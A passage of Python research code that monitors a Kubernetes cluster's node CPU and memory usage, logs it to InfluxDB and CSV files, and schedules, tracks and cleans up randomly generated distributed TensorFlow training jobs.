matched_data = math.ceil(int(cache)/1024)
return matched_data
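# Parse an RFC3339 timestamp, assume UTC when no timezone is attached,
# and return whole seconds since the Unix epoch.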
def match_timestamp(raw_data):
EPOCH = UTC.localize(datetime.utcfromtimestamp(0))
timestamp = parser.parse(raw_data)
if not timestamp.tzinfo:
print("XXX")
timestamp = UTC.localize(timestamp)
s = (timestamp - EPOCH).total_seconds()
return int(s)
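# Build one InfluxDB point per node from the metrics API response: absolute CPU
# (millicores) and memory (MiB) usage plus usage ratios against the hard-coded
# per-node capacities; all points share the creation timestamp of the first item.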
def generate_item(response,measurement):
node_cpu = {}
node_cpu['k8s-master'] = 32000
node_cpu['k8s-worker0'] = 24000
node_cpu['k8s-worker2'] = 24000
node_cpu['k8sworker1'] = 16000
node_cpu['k8s-worker3'] = 24000
node_cpu['k8s-worker4'] = 16000
node_cpu['k8s-worker5'] = 24000
node_memory = {}
node_memory['k8s-master'] = float(251 * 1024)
node_memory['k8s-worker0'] = float(94 * 1024)
node_memory['k8s-worker2'] = float(94 * 1024)
node_memory['k8sworker1'] = float(125 * 1024)
node_memory['k8s-worker3'] = float(94 * 1024)
node_memory['k8s-worker4'] = float(125 * 1024)
node_memory['k8s-worker5'] = float(94 * 1024)
points = []
# content = {}
timestamp = response['items'][0]['metadata']['creationTimestamp']
for item in response['items']:
content = {
'measurement': measurement,
'tags':{
"nodes": item['metadata']['name']
},
'fields': {
'cpu': match_cpu(item['usage']['cpu']),
'memory': match_memory(item['usage']['memory']),
'cpu_percent': float(match_cpu(item['usage']['cpu'])/node_cpu[item['metadata']['name']]),
'memory_percent': float(match_memory(item['usage']['memory']) / node_memory[item['metadata']['name']])
},
'time': match_timestamp(timestamp)
}
points.append(content)
return points
def DeletefromDB(Client,DatabaseName):
databases = Client.get_list_database()
for Cn in databases:
if DatabaseName in Cn.values():
Client.drop_database(DatabaseName)
break
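# Sampler process: every args.derivation seconds it scrapes the node metrics URL,
# writes per-node points to InfluxDB, and every 30 samples flushes the buffered
# series to CSV files, appends the current pod-to-node layout to node.json, and
# clears the in-memory buffers.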
class Node_mess(multiprocessing.Process):
def __init__(self,url,args,tasks,v1):
multiprocessing.Process.__init__(self)
self.url = url
self.args = args
self.derivation = args.derivation
self.time_mess = {}
self.cpu_mess = {}
self.memory_mess = {}
self.cpu_per = {}
self.memory_per = {}
self.node_cpu = {}
self.node_cpu['k8s-master'] = 32000
self.node_cpu['k8s-worker0'] = 24000
self.node_cpu['k8s-worker2'] = 24000
self.node_cpu['k8sworker1'] = 16000
self.node_cpu['k8s-worker3'] = 24000
self.node_cpu['k8s-worker4'] = 16000
self.node_cpu['k8s-worker5'] = 24000
self.node_memory = {}
self.node_memory['k8s-master'] = float(251 * 1024)
self.node_memory['k8s-worker0'] = float(94 * 1024)
self.node_memory['k8s-worker2'] = float(94 * 1024)
self.node_memory['k8sworker1'] = float(125 * 1024)
self.node_memory['k8s-worker3'] = float(94 * 1024)
self.node_memory['k8s-worker4'] = float(125 * 1024)
self.node_memory['k8s-worker5'] = float(94 * 1024)
# self.derivation = derivation
self.arg = args
self.tasks = tasks
self.v1 = v1
self.database = args.database
self.measurement = args.measurement
self.save_path = args.save_path
if not os.path.exists(self.arg.save_path):
os.makedirs(self.arg.save_path)
database_create(self.database)
self.client = influxdb.InfluxDBClient('192.168.128.10',port=8086,username='admin',password='admin',database=self.database)
#derivation
# def node_measurement(self,node_list):
# # Global_Influx.Client_all.get_list_measurements()
def run(self):
print(multiprocessing.current_process().pid)
print(os.getpid())
response = catch_message(self.url)
self.time_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.cpu_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.memory_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.cpu_per['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.memory_per['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
for item in response['items']:
self.time_mess[item['metadata']['name']] = [item['timestamp']]
self.cpu_mess[item['metadata']['name']] = [match_cpu(item['usage']['cpu'])]
self.memory_mess[item['metadata']['name']] = [match_memory(item['usage']['memory'])]
self.cpu_per[item['metadata']['name']] = [float(match_cpu(item['usage']['cpu'])/self.node_cpu[item['metadata']['name']])]
self.memory_per[item['metadata']['name']] = [float(match_memory(item['usage']['memory']) / self.node_memory[item['metadata']['name']])]
self.client.write_points(generate_item(response,self.measurement),'s',database=self.database)
time.sleep(self.derivation)
while True:
response = catch_message(self.url)
self.time_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.cpu_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.memory_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.cpu_per['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.memory_per['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
for item in response['items']:
self.time_mess[item['metadata']['name']].append(item['timestamp'])
self.cpu_mess[item['metadata']['name']].append(match_cpu(item['usage']['cpu']))
self.memory_mess[item['metadata']['name']].append(match_memory(item['usage']['memory']))
self.cpu_per[item['metadata']['name']].append(float(match_cpu(item['usage']['cpu'])/self.node_cpu[item['metadata']['name']]))
self.memory_per[item['metadata']['name']].append(float(match_memory(item['usage']['memory']) / self.node_memory[item['metadata']['name']]))
self.client.write_points(generate_item(response, self.measurement), 's', database=self.database)
if len(self.time_mess['creation'])%30==0 and len(self.time_mess['creation']) > 0:
data_frame = pd.DataFrame(self.time_mess)
data_frame.to_csv(self.save_path + '/' + 'struct.csv', mode='a+', index=False, sep=',')
print(self.cpu_mess)
print(len(self.cpu_mess))
for keyss in self.cpu_mess:
print(keyss+": "+str(len(self.cpu_mess[keyss])))
data_frame2 = pd.DataFrame(self.cpu_mess)
data_frame2.to_csv(self.save_path + '/' + 'node_cpu.csv', mode='a+', index=False, sep=',')
data_frame3 = pd.DataFrame(self.memory_mess)
data_frame3.to_csv(self.save_path + '/' + 'node_memory.csv', mode='a+', index=False, sep=',')
data_frame4 = pd.DataFrame(self.cpu_per)
data_frame4.to_csv(self.save_path + '/' + 'node_cpu_per.csv', mode='a+', index=False, sep=',')
data_frame5 = pd.DataFrame(self.memory_per)
data_frame5.to_csv(self.save_path + '/' + 'node_memory_per.csv', mode='a+', index=False, sep=',')
f1 = open('/tfdata/nodedata/node.json', 'r', encoding='utf-8')
res = f1.read()
a = json.loads(res)
f1.close()
node_layout = {}
node_list = [i.metadata.name for i in self.v1.list_node().items]
for node in node_list:
node_layout[node] = []
for ns in self.tasks['ns']:
tmp_layout = self.tasks['nslayout']
if tmp_layout[ns]:
pod_list = [i for i in self.v1.list_namespaced_pod(ns).items]
for pod in pod_list:
try:
node_layout[pod.spec.node_name].append(pod.metadata.name)
except Exception as e0:
print(e0)
a.append(node_layout)
f2 = open('/tfdata/nodedata/node.json', 'w', encoding='utf-8')
node_json = json.dumps(a, ensure_ascii=False, indent=4)  # serialize the layout list to a JSON string
f2.write(node_json)
f2.close()
for key in self.time_mess:
self.time_mess[key] = []
self.cpu_mess[key] = []
self.memory_mess[key] = []
self.memory_per[key] = []
self.cpu_per[key] = []
time.sleep(self.derivation)
def get_ns(v1):
ns_list = []
for i in v1.list_namespace().items:
ns_list.append(i.metadata.name)
return ns_list
# def get_layout():
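# Watch the tracked namespaces: drop a namespace that never appears, and when its
# pods reach Succeeded/Failed record the exit reasons, delete the job yaml and the
# namespace, and remove it from the shared bookkeeping dictionaries.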
def Monitor_job(tasks,lock,v1,jobs):
time.sleep(10)
while True:
if tasks['start'] == False:
break
ns_list = get_ns(v1)
print(ns_list)
if tasks['start'] == True and tasks['count'] == 0:
time.sleep(30)
pass
else:
for ns in tasks['ns']:
print(ns + ' in ns_list: ' + str(ns in ns_list))
if ns not in ns_list:
try_times = 10
while try_times > 0:
time.sleep(float(random.randint(5, 10)))
if ns in ns_list:
break
try_times=try_times-1
if try_times <=0 :
lock.acquire()
ns_tmp = tasks['ns']
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
is_layout.pop(ns)
tasks['nslayout'] = is_layout
count_tmp = len(ns_tmp)
tasks['count'] = count_tmp
lock.release()
else:
# print(b[0].status.container_statuses[0].state.terminated.reason)
pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
# if 'Running' in pod_status:
#
# time.sleep(5)
# lock.acquire()
# print("Select the loayout!")
# tmp_layout = tasks['nslayout']
# tmp_keys = list(tmp_layout.keys())
# if ns in tmp_keys and tmp_layout[ns]==False:
# tmp_layout_config = {}
# for i in v1.list_namespaced_pod(ns).items:
# tmp_layout_config[i.metadata.name] = i.spec.node_name
# fp = open('/tfdata/k8snfs/'+ns+'/layout.json', 'w', encoding='utf-8')
# # ensure_ascii defaults to True: non-ASCII characters would be escaped as \uXXXX; setting it to False keeps them readable
# dicc_json = json.dumps(tmp_layout_config, ensure_ascii=False, indent=4) # dump the layout dict to a JSON string
# fp.write(dicc_json)
# fp.close()
# tmp_layout[ns] = True
# tasks['nslayout'] = tmp_layout
# lock.release()
if 'Succeeded' in pod_status or 'Failed' in pod_status:
# # print(b[0].status.container_statuses[0].state.terminated.reason)
# pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
# ['OOMKilled']
time.sleep(15)
try:
exit_reason = [i.status.container_statuses[0].state.terminated.reason for i in
v1.list_namespaced_pod(ns).items]
print(exit_reason)
exit_ict = {'reasons': exit_reason}
exit_path = '/tfdata/k8snfs/%s/exit_reason.json' % ns
exit_json = json.dumps(exit_ict, ensure_ascii=False, indent=4)
fw_exit = open(exit_path, 'w', encoding='utf-8')
fw_exit.write(exit_json)
fw_exit.close()
except Exception as e:
print(e)
time.sleep(10)
lock.acquire()
# job_tmp = tasks['job']
# job = job_tmp[ns]
# job.delete_tf()
# command = 'kubectl delete -f /tfdata/tfcnn/expjob/'+ns+'.yaml'
command = 'kubectl delete -f /tfdata/tfcnn/expjob/' + ns + '.yaml'
os.system(command)
v1.delete_namespace(ns)
ns_tmp = tasks['ns']
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
is_layout.pop(ns)
for i in range(len(jobs)):
if jobs[i] == ns:
jobs.pop(i)
break
tasks['nslayout'] = is_layout
# job_tmp.pop(ns)
# tasks['job'] = job_tmp
tasks['count'] -= 1
lock.release()
time.sleep(5)
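# Turn an epoch-seconds value into the nanosecond timestamp string expected by an
# InfluxDB WHERE time clause: floor(t-1) for a lower bound (mode 0), ceil(t+1) for
# an upper bound, then append nine zeros.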
def make_time_query(time_base,mode=0):
if mode == 0:
time_query = (math.floor(time_base-1))
time_query_str = str(time_query)+'000000000'
else:
time_query = (math.ceil(time_base+1))
time_query_str = str(time_query)+'000000000'
return time_query_str
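# Per-job collector: wait until all ps/worker pods are Running and record the
# pod-to-node layout, then repeatedly join the job's per-step timing samples with
# node load from NODEMESSAGE and write the combined points to the PREDICT database;
# once enough new steps have accumulated it also rescales the job's CPU/memory allocation.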
def catch_node_step_msg(jobs,job_name,tasks,lock,batch,flops,params,mode):
node_influx_client = influxdb.InfluxDBClient(host='192.168.128.10',username='admin',password='admin',database='NODEMESSAGE')
step_influx_client = influxdb.InfluxDBClient(host='192.168.128.10',username='admin',password='admin',database='PREDICT')
jieshu = False
lock.acquire()
for jo in jobs:
if jo == job_name:
job = reload_jobs(job_name,-1)
print('reload job success!')
break
lock.release()
count = 0
while True:
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
run_result = pd.value_counts(pod_status)
run_result_dict = dict(run_result)
print(run_result_dict)
if 'Running' in pod_status and run_result_dict['Running'] == (job.ps_replicas + job.worker_replicas):
time.sleep(10)
lock.acquire()
print("Select the loayout!")
tmp_layout = tasks['nslayout']
tmp_keys = list(tmp_layout.keys())
if job_name in tmp_keys and tmp_layout[job_name] == False:
tmp_layout_config = {}
for i in job.v1.list_namespaced_pod(job_name).items:
tmp_layout_config[i.metadata.name] = i.spec.node_name
fp = open('/tfdata/k8snfs/' + job_name + '/layout.json', 'w', encoding='utf-8')
# ensure_ascii defaults to True: non-ASCII characters would be escaped as \uXXXX; setting it to False keeps them readable
dicc_json = json.dumps(tmp_layout_config, ensure_ascii=False, indent=4) # dump the layout dict to a JSON string
fp.write(dicc_json)
fp.close()
tmp_layout[job_name] = True
tasks['nslayout'] = tmp_layout
lock.release()
break
elif 'Succeeded' in pod_status or 'Failed' in pod_status:
jieshu = True
print("Exception exit! Pending Problem!")
return
elif not run_result_dict:
if count > 10:
jieshu = True
print("Exception exit! Creating Problem!")
return
count+=1
time.sleep(30)
else:
time.sleep(30)
job_measure = job.measure
print("job measure: %s" % job.measure)
pre_list = job_measure.split(' ')
measure_s = pre_list[0] + 'S' + pre_list[-1]
measure_load = pre_list[0]+'L'+pre_list[-1]
ns_name = job.name
tmp_creation = tasks['creation'][:]
if mode < 0:
time_base = tasks['creation'][-1]
else:
time_base = tasks['creation'][-1]
# time_avg = []
ns_layout = {}
# worker_num = 0
while True:
lock.acquire()
tmp_layout = tasks["nslayout"]
lock.release()
print("Get the layout config!")
if jieshu:
break
if tmp_layout[ns_name]:
layout_file = '/tfdata/k8snfs/%s/layout.json' % ns_name
layout_dict = load_config(layout_file)
layout_key = list(layout_dict.keys())
for layout_msg in layout_key:
if 'worker' in layout_msg:
idx = layout_msg[-1]
ns_key = 'worker'+idx
ns_layout[ns_key] = layout_dict[layout_msg]
# worker_num = worker_num+1
print(ns_layout)
break
else:
time.sleep(10)
# time_query = ((time_base - 1)* 1e9)
time_query_str = make_time_query(time_base,mode=0)
print('first time query: %s' % time_query_str)
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
print('first query success!')
print(keys)
mana = 0
step_base = read_step_base(job.name)
step_high = step_base+1
while True:
# step_base = 0
print("%s try_time=%d" % (job_name,mana))
print(keys)
if jieshu:
break
if mana > 100:
jieshu = True
break
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
break
if keys and len(keys) == job.worker_replicas:
print("Start to get load-run data")
node_list = [b['nodes'] for a, b in keys]
dic_msg = {}
for node in node_list:
for i in range(len(keys)):
_, no = keys[i]
if no['nodes'] == node:
dic_msg[node] = list(res[keys[i]])
print(dic_msg)
time_base_list = []
time_low_list = []
time_node_avg = {}
time_avg = []
step_base_list = []
for node in node_list:
time_low_list.append(int(match_timestamp(dic_msg[node][0]['time'])))
time_base_list.append(int(match_timestamp(dic_msg[node][-1]['time'])))
time_avg_list = [float(i['time_d']) for i in dic_msg[node]]
step_base_list.append(int(dic_msg[node][-1]['step']))
time_avg_node = np.mean(time_avg_list)
time_node_avg[node] = time_avg_node
time_avg.append(time_avg_node)
print(time_avg)
step_base = max(step_base_list)
write_step_base(job.name,step_base)
print("step base is %d" % step_base)
print(type(step_base))
time_low = math.floor(min(time_low_list)-5)
time_high = math.ceil(max(time_base_list)+10)
time_low_str = make_time_query(time_low,mode=0)
time_high_str = make_time_query(time_high,mode=1)
# result = self.influx_client.query("select * from "+"NODEMESSAGE"+" group by nodes order by desc limit 3")
load_result = node_influx_client.query("select * from NODEMESSAGE where time >= "+time_low_str+" and time <= "+time_high_str+" group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
print(load_result)
worker_nodes = [i[-1]['nodes'] for i in result_keys]
print(worker_nodes)
worker_node_mg = [list(load_result[i]) for i in result_keys]
print(worker_node_mg)
if not worker_node_mg:
load_result = node_influx_client.query("select * from NODEMESSAGE where time >= "+time_low_str+" group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
print(load_result)
worker_nodes = [i[-1]['nodes'] for i in result_keys]
print(worker_nodes)
worker_node_mg = [list(load_result[i]) for i in result_keys]
print(worker_node_mg)
cpu_use = {}
total_cpu_use = 0.0
total_memory_use = 0.0
total_cpu = 0
total_memory = 0
memory_use = {}
print(len(worker_node_mg))
print('start to write first points!')
try:
for i in range(len(worker_node_mg)):
cpu_use[worker_nodes[i]] = 0
memory_use[worker_nodes[i]] = 0
for j in range(len(worker_node_mg[i])):
print(len(worker_node_mg[i]))
try:
cpu_use[worker_nodes[i]] += worker_node_mg[i][j]['cpu']
print(cpu_use)
memory_use[worker_nodes[i]] += worker_node_mg[i][j]['memory']
except Exception as e0:
print(e0)
cpu_use[worker_nodes[i]] = (cpu_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_cpu[
worker_nodes[i]]
memory_use[worker_nodes[i]] = (memory_use[worker_nodes[i]] / len(worker_node_mg[i])) / \
job.node_memory[worker_nodes[i]]
total_cpu_use += (cpu_use[worker_nodes[i]] * job.node_cpu[worker_nodes[i]])
total_cpu += job.node_cpu[worker_nodes[i]]
total_memory_use += (memory_use[worker_nodes[i]] * job.node_memory[worker_nodes[i]])
total_memory += job.node_memory[worker_nodes[i]]
print(cpu_use)
print(memory_use)
except Exception as e:
print(e)
total_cpu_use = total_cpu_use / total_cpu
total_memory_use = total_memory_use / total_memory
points = []
# # content = {}
# timestamp = response['items'][0]['metadata']['creationTimestamp']
for node in node_list:
content = {
'measurement': measure_load,
'tags':{
"nodes": node,
"workerpoint":ns_layout[node],
"task_id": job.task_id,
"runtimes":job.rtimes,
"retry":job.retry
},
'fields': {
'node_cpu': cpu_use[ns_layout[node]],
'node_memory': memory_use[ns_layout[node]],
'time_avg': time_node_avg[node],
'total_cpu': total_cpu_use,
'total_memory': total_memory_use,
'cpu_allocate': job.cpu_allocate,
'memory_allocate':job.memory_allocate,
'node_compute': job.node_compute[ns_layout[node]],
'node_cmtype': job.node_cmtype[ns_layout[node]],
'node_disk': job.node_disk[ns_layout[node]],
'batch': batch,
'flops':flops,
'params':params,
'ps':job.ps_replicas,
'worker':job.worker_replicas
}
}
points.append(content)
print(points[0])
try:
step_influx_client.write_points(points, 's', database="PREDICT")
print("Success to write a point!")
except Exception as e:
print(e)
time_base = math.floor(min(time_base_list))
print(time_base)
time_sleep = max(time_avg)*8
time.sleep(time_sleep)
break
else:
time.sleep(10)
# res = client.query("select * from " + measure_s + " where nodes='worker0' order by desc limit 10")
try:
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
except Exception as e1:
print(e1)
mana = mana + 1
if jieshu:
print("Please check the error!!!")
return
while True:
if tasks['start']==False:
break
# lock.acquire()
tmp_ns = tasks["ns"]
# lock.release()
if job.name not in tmp_ns :
break
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
break
time_query_str = make_time_query(time_base, mode=0)
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
node_list = [b['nodes'] for a, b in keys]
dic_msg = {}
for node in node_list:
for i in range(len(keys)):
_, no = keys[i]
if no['nodes'] == node:
dic_msg[node] = list(res[keys[i]])
time_base_list = []
time_low_list = []
time_node_avg = {}
time_avg = []
step_hight_list = []
for node in node_list:
time_low_list.append(match_timestamp(dic_msg[node][0]['time']))
time_base_list.append(match_timestamp(dic_msg[node][-1]['time']))
time_avg_list = [float(i['time_d']) for i in dic_msg[node]]
# step_base_list.append(int(dic_msg[node][-1]['step']))
step_hight_list.append(int(dic_msg[node][-1]['step']))
time_avg_node = np.mean(time_avg_list)
time_node_avg[node] = time_avg_node
time_avg.append(time_avg_node)
time_low = math.floor(min(time_low_list) - 7)
time_high = math.ceil(max(time_base_list) + 8)
step_high = max(step_hight_list)
print("step high is %d" % step_high)
print(step_hight_list)
time_low_str = make_time_query(time_low, mode=0)
time_high_str = make_time_query(time_high, mode=1)
# result = self.influx_client.query("select * from "+"NODEMESSAGE"+" group by nodes order by desc limit 3")
load_result = node_influx_client.query(
"select * from NODEMESSAGE where time >= " + time_low_str + " and time <= " + time_high_str + " group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
worker_nodes = [i[-1]['nodes'] for i in result_keys]
worker_node_mg = [list(load_result[i]) for i in result_keys]
cpu_use = {}
total_cpu_use = 0.0
total_memory_use = 0.0
total_cpu = 0
total_memory = 0
memory_use = {}
for i in range(len(worker_node_mg)):
cpu_use[worker_nodes[i]] = 0
memory_use[worker_nodes[i]] = 0
for j in range(len(worker_node_mg[i])):
cpu_use[worker_nodes[i]] += worker_node_mg[i][j]['cpu']
memory_use[worker_nodes[i]] += worker_node_mg[i][j]['memory']
cpu_use[worker_nodes[i]] = (cpu_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_cpu[
worker_nodes[i]]
memory_use[worker_nodes[i]] = (memory_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_memory[
worker_nodes[i]]
total_cpu_use += (cpu_use[worker_nodes[i]]*job.node_cpu[worker_nodes[i]])
total_cpu += job.node_cpu[worker_nodes[i]]
total_memory_use += (memory_use[worker_nodes[i]]*job.node_memory[worker_nodes[i]])
total_memory += job.node_memory[worker_nodes[i]]
total_cpu_use = total_cpu_use / total_cpu
total_memory_use = total_memory_use / total_memory
points = []
# # content = {}
# timestamp = response['items'][0]['metadata']['creationTimestamp']
for node in node_list:
content = {
'measurement': measure_load,
'tags': {
"nodes": node,
"workerpoint":ns_layout[node],
"task_id": job.task_id,
"runtimes":job.rtimes,
"retry":job.retry
},
'fields': {
'node_cpu': cpu_use[ns_layout[node]],
'node_memory': memory_use[ns_layout[node]],
'time_avg': time_node_avg[node],
'total_cpu': total_cpu_use,
'total_memory': total_memory_use,
'cpu_allocate': job.cpu_allocate,
'memory_allocate': job.memory_allocate,
'node_compute': job.node_compute[ns_layout[node]],
'node_cmtype': job.node_cmtype[ns_layout[node]],
'node_disk': job.node_disk[ns_layout[node]],
'batch': batch,
'flops': flops,
'params': params,
'ps': job.ps_replicas,
'worker': job.worker_replicas
}
}
points.append(content)
step_influx_client.write_points(points, 's', database="PREDICT")
print("write a point success!!!")
time_base = math.floor(min(time_base_list))
try:
print("now running: %d " % (step_high - step_base))
except Exception as e:
print(e)
if step_high - step_base >= 20:
alpha = random.randint(0, 5) * 0.1 + 0.5
beta = random.randint(0,5)*0.1+0.87
print("before apply:%d" % job.cpu_allocate)
job.set_resource(cpu_source=(math.ceil(job.cpu_allocate * alpha)), mem_source=(math.ceil(job.memory_allocate * beta)))
try:
job.assignment_resource(cpu_source=(math.ceil(job.cpu_allocate * alpha)),memory_source=(math.ceil(job.memory_allocate * beta)))
except Exception as e0:
print(e0)
print("apply job success!")
print("after apply: %d" % job.cpu_allocate)
step_base = step_high
write_step_base(job.name,step_base)
print("now step base is %d" % step_base)
print("next select based on time %d" % time_base)
time_sleep = max(time_avg) * 8
time.sleep(time_sleep)
# result = step_influx_client.query("select * from " + measure_s + " group by nodes order by desc limit 3")
# 1580976233000000000
def get_load_value(node_index,cpu_base,memory_base,total_cpu_base,total_memory_base):
keys = node_index.keys()
alpha = 0.62
cpu_score = 0
memory_score = 0
node_use = []
node_cpu = []
node_mem = []
for key in keys:
if node_index[key] < 3:
node_use.append(key)
for key in node_use:
cpu_score+= cpu_base[key]
node_cpu.append(cpu_base[key])
memory_score+= memory_base[key]
node_mem.append(memory_base[key])
cpu_score = cpu_score/len(node_use)
memory_score = memory_score/len(node_use)
cpu_score = alpha*cpu_score+(1-alpha)*total_cpu_base
memory_score = alpha*memory_score+(1-alpha)*total_memory_base
return cpu_score,memory_score,node_cpu,node_mem
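# Illustrative worked example (comment added for clarity; values are hypothetical):
# get_load_value keeps only the nodes ranked below 3 in node_index and blends their mean
# utilisation with the cluster-wide figure using alpha = 0.62. With
#   cpu_base = {'w0': 0.2, 'w1': 0.4}, total_cpu_base = 0.5 and both nodes ranked < 3,
# the per-node mean is 0.3, so cpu_score = 0.62 * 0.3 + 0.38 * 0.5 = 0.376.
# memory_score is weighted in exactly the same way.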
def Submit_job(tasks,lock,v1,jobs):
global LOSSHOST,LOSSPORT
ADDR = (LOSSHOST,LOSSPORT)
max_buffer_size = 4
job_basic = reload_jobs(tasks['last'],-1)
max_free_heap = MaxHeap(max_size=max_buffer_size,fn=worker_queue.value_free_load)
max_wight_heap = MaxHeap(max_size=max_buffer_size,fn=worker_queue.value_weight_load)
worker_buffer = tasks['buffer']
first_reload = False
time.sleep(20)
if worker_buffer:
first_reload = True
pool = multiprocessing.Pool(processes=5)
for job0 in jobs:
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job0, job0)
#job_res_config = {'deadline':job.deadline,'start_time':job.starttime,
# 'cpu_source':job.cpu_allocate,'mem_source':job.memory_allocate,
# 'cpu_high':cpu_base,'batch_res':batch_res,
# 'flops_res':flops_res,'params_res':params_res}
res_config = load_config(save_res_path)
batch_res = res_config['batch_res']
flops_res = res_config['flops_res']
params_res = res_config['params_res']
# catch_node_step_msg(jobs=,job_name=,tasks=,lock=,batch=,flops=,params=,mode=)
pool.apply_async(catch_node_step_msg,args=(jobs,job0,tasks,lock,batch_res,flops_res,params_res,-1))
while True:
if tasks['start']==False:
break
lock.acquire()
counts = tasks['count']
bufer_count = tasks['buffercount']
lock.release()
if (counts >= tasks['size']) and (bufer_count >= max_buffer_size):
time.sleep(float(random.randint(10,15)))
pass
elif tasks['next'] and counts < tasks['size']:
job_name = tasks['next']
job = reload_jobs(job_name,-1)
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
# mem_need = job.total_mem * total_mem_use + job.worker_replicas * job.memory_allocate + 2048 * job.ps_replicas
# cpu_need = job.total_cpu * total_cpu_use + job.worker_replicas * job.cpu_allocate + 1000 * job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key] * (1 - cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= 1 and catch_worker>=1:
break
if catch_ps > 0 and catch_worker > 0:
lock.acquire()
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
tasks['next'] = ''
lock.release()
else:
time.sleep(30)
else:
time.sleep(150)
deadline = random.randint(3600, 18000)
if tasks['reload'] == 0:
template_id = random.randint(1, 4)
print(template_id)
lock.acquire()
tmp1 = tasks['task_id']
tmp1[template_id - 1] += 1
tasks['task_id'] = tmp1
tmp2 = tasks['rtimes']
tmp2[template_id - 1] += 1
tasks['rtimes'] = tmp2
# tasks['ps_replicas'][template_id - 1] = random.randint(1, 3)
# tasks['worker_replicas'][template_id - 1] = random.randint(2, 6)
# tasks['batch_size'][template_id - 1] = random.randint(128, 1024)
lock.release()
ps_r = random.randint(1, 3)
worker_r = random.randint(1, 4)
batch = random.randint(128, 1024)
measure = "VGG 1"
print(tasks)
if template_id == 1:
channels = [24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400, 480,
512,
576]
x1 = random.randint(0, 4)
x2 = random.randint(4, 7)
x3 = random.randint(7, 11)
x4 = random.randint(11, 15)
x5 = random.randint(15, 19)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
channel5 = channels[x5]
num_layer1 = random.randint(2, 4)
num_layer2 = random.randint(2, 4)
num_layer3 = random.randint(3, 6)
num_layer4 = random.randint(3, 8)
num_layer5 = random.randint(3, 8)
# def __init__(self,v1,template_id,ps_replicas,worker_replicas,training_step,batch_size,interval,task_id,rtimes,tag,repeat,channel1,channel2,channel3,channel4,channel5,channel6,channel7,channel8,dbhost='192.168.128.10', retry=0, update_min_step=400, step_update=200, update_start=0.25,
# update_end=0.75, update_delay=2.0):
job = VGGTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], channel1=channel1, channel2=channel2,
channel3=channel3,
channel4=channel4, channel5=channel5,
